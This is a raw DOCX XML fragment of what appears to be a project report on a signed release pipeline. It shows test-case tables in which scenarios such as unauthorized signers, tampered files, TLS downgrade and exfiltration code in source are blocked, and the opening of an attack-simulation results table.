            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Revoked / below-minimum version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - REVOKED / REPLAY_BLOCKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - REVOKED / REPLAY_BLOCKED</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TC07c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Old trust policy replayed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_TRUST_POLICY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_TRUST_POLICY</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TC07d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Trust policy edited on registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_TRUST_POLICY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - INVALID_TRUST_POLICY</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TC08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Wrong role / bad MFA / unknown user signs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DENIED - UNAUTHORIZED_SIGNER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DENIED - UNAUTHORIZED_SIGNER</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TC08b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exfiltration code in source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BUILD STOPPED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BUILD STOPPED</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TC09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>New release after key rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PASS / DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PASS / DEPLOY</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TC10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Audit log row edited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Chain BROKEN detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Chain BROKEN detected</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TC11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Key file encrypted, 0600, wrong passphrase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Protected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Protected</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TC12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TLS 1.2 downgrade attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TLS 1.3 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TLS 1.3 only</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TC13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampered file served over valid TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - HASH_MISMATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BLOCK - HASH_MISMATCH</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TC14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>End-to-end pipeline, legit release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>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794"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TC15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>200 random mutations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0 accepted (FAR = 0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0 accepted (FAR = 0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PASS</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val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>All 25 of 25 tracked test cases passed, and the full suite reported 25 of 25 tests passing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.3 Attack Simulation Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 7.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Attack simulation results</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="623"/>
        <w:gridCol w:w="3515"/>
        <w:gridCol w:w="1020"/>
        <w:gridCol w:w="1020"/>
        <w:gridCol w:w="2041"/>
        <w:gridCol w:w="737"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="624"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Actual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Status code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Result</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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Legitimate artifact v1.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
